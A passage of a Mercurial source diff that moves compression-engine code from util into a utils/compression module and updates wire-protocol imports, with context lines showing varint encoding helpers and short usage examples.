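    assert zstdsupport.serverpriority > zlibsupport.serverpriority
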
3218 class compressormanager(object):
3219 """Holds registrations of various compression engines.
3220
@@ -3764,7 +595,7 b' class _zstdengine(compressionengine):'
3764 # Not all installs have the zstd module available. So defer importing
3765 # until first access.
3766 try:
3767 from . import zstd
598 from .. import zstd
3768 # Force delayed import.
3769 zstd.__version__
3770 return zstd
@@ -3914,108 +745,3 b' def bundlecompressiontopics():'
3914 return items
3915
3916 i18nfunctions = bundlecompressiontopics().values()
3917
3918 # convenient shortcut
3919 dst = debugstacktrace
3920
3921 def safename(f, tag, ctx, others=None):
3922 """
3923 Generate a name that it is safe to rename f to in the given context.
3924
3925 f: filename to rename
3926 tag: a string tag that will be included in the new name
3927 ctx: a context, in which the new name must not exist
3928 others: a set of other filenames that the new name must not be in
3929
3930 Returns a file name of the form oldname~tag[~number] which does not exist
3931 in the provided context and is not in the set of other names.
3932 """
3933 if others is None:
3934 others = set()
3935
3936 fn = '%s~%s' % (f, tag)
3937 if fn not in ctx and fn not in others:
3938 return fn
3939 for n in itertools.count(1):
3940 fn = '%s~%s~%s' % (f, tag, n)
3941 if fn not in ctx and fn not in others:
3942 return fn
3943
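A sketch with plain sets standing in for the changectx and the 'others' collection, since only membership tests are needed:

    taken = {b'file.txt~resolve', b'file.txt~resolve~1'}
    assert (safename(b'file.txt', b'resolve', set(), others=taken)
            == b'file.txt~resolve~2')
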
3944 def readexactly(stream, n):
3945 '''read n bytes from stream.read and abort if less was available'''
3946 s = stream.read(n)
3947 if len(s) < n:
3948 raise error.Abort(_("stream ended unexpectedly"
3949 " (got %d bytes, expected %d)")
3950 % (len(s), n))
3951 return s
3952
3953 def uvarintencode(value):
3954 """Encode an unsigned integer value to a varint.
3955
3956 A varint is a variable length integer of 1 or more bytes. Each byte
3957 except the last has the most significant bit set. The lower 7 bits of
3958 each byte store the value's binary representation, least significant group
3959 first.
3960
3961 >>> uvarintencode(0)
3962 '\\x00'
3963 >>> uvarintencode(1)
3964 '\\x01'
3965 >>> uvarintencode(127)
3966 '\\x7f'
3967 >>> uvarintencode(1337)
3968 '\\xb9\\n'
3969 >>> uvarintencode(65536)
3970 '\\x80\\x80\\x04'
3971 >>> uvarintencode(-1)
3972 Traceback (most recent call last):
3973 ...
3974 ProgrammingError: negative value for uvarint: -1
3975 """
3976 if value < 0:
3977 raise error.ProgrammingError('negative value for uvarint: %d'
3978 % value)
3979 bits = value & 0x7f
3980 value >>= 7
3981 bytes = []
3982 while value:
3983 bytes.append(pycompat.bytechr(0x80 | bits))
3984 bits = value & 0x7f
3985 value >>= 7
3986 bytes.append(pycompat.bytechr(bits))
3987
3988 return ''.join(bytes)
3989
3990 def uvarintdecodestream(fh):
3991 """Decode an unsigned variable length integer from a stream.
3992
3993 The passed argument is anything that has a ``.read(N)`` method.
3994
3995 >>> try:
3996 ... from StringIO import StringIO as BytesIO
3997 ... except ImportError:
3998 ... from io import BytesIO
3999 >>> uvarintdecodestream(BytesIO(b'\\x00'))
4000 0
4001 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4002 1
4003 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4004 127
4005 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4006 1337
4007 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4008 65536
4009 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4010 Traceback (most recent call last):
4011 ...
4012 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4013 """
4014 result = 0
4015 shift = 0
4016 while True:
4017 byte = ord(readexactly(fh, 1))
4018 result |= ((byte & 0x7f) << shift)
4019 if not (byte & 0x80):
4020 return result
4021 shift += 7
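
As a worked example of the encoding above, 1337 is 0b10100111001: the low seven bits (0b0111001, 0x39) are emitted first with the continuation bit set, giving 0xb9, and the remaining bits (0b1010, 0x0a) form the final byte, hence b'\xb9\n' as in the doctests. A roundtrip sketch, assuming the module's byte-string semantics:

    from io import BytesIO

    for value in (0, 1, 127, 128, 1337, 65536):
        encoded = uvarintencode(value)
        assert uvarintdecodestream(BytesIO(encoded)) == value
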
@@ -23,6 +23,7 b' from . import ('
23 )
24 from .utils import (
25 cborutil,
26 compression,
26 interfaceutil,
27 )
28
@@ -144,7 +145,7 b' class httpv1protocolhandler(object):'
144 caps.append('httpmediatype=0.1rx,0.1tx,0.2tx')
145
146 compengines = wireprototypes.supportedcompengines(repo.ui,
147 util.SERVERROLE)
148 compression.SERVERROLE)
148 if compengines:
149 comptypes = ','.join(urlreq.quote(e.wireprotosupport().name)
150 for e in compengines)
@@ -320,11 +321,12 b' def _httpresponsetype(ui, proto, prefer_'
320 if '0.2' in proto.getprotocaps():
321 # All clients are expected to support uncompressed data.
322 if prefer_uncompressed:
323 return HGTYPE2, util._noopengine(), {}
324 return HGTYPE2, compression._noopengine(), {}
324
325 # Now find an agreed upon compression format.
326 compformats = wireprotov1server.clientcompressionsupport(proto)
327 for engine in wireprototypes.supportedcompengines(ui, util.SERVERROLE):
328 for engine in wireprototypes.supportedcompengines(ui,
329 compression.SERVERROLE):
328 if engine.wireprotosupport().name in compformats:
329 opts = {}
330 level = ui.configint('server', '%slevel' % engine.name())
@@ -18,6 +18,7 b' from . import ('
18 util,
19 )
20 from .utils import (
21 compression,
21 interfaceutil,
22 )
23
@@ -316,12 +317,12 b' class commanddict(dict):'
316
317 def supportedcompengines(ui, role):
318 """Obtain the list of supported compression engines for a request."""
319 assert role in (util.CLIENTROLE, util.SERVERROLE)
320 assert role in (compression.CLIENTROLE, compression.SERVERROLE)
320
321 compengines = util.compengines.supportedwireengines(role)
322 compengines = compression.compengines.supportedwireengines(role)
322
323 # Allow config to override default list and ordering.
324 if role == util.SERVERROLE:
325 if role == compression.SERVERROLE:
325 configengines = ui.configlist('server', 'compressionengines')
326 config = 'server.compressionengines'
327 else: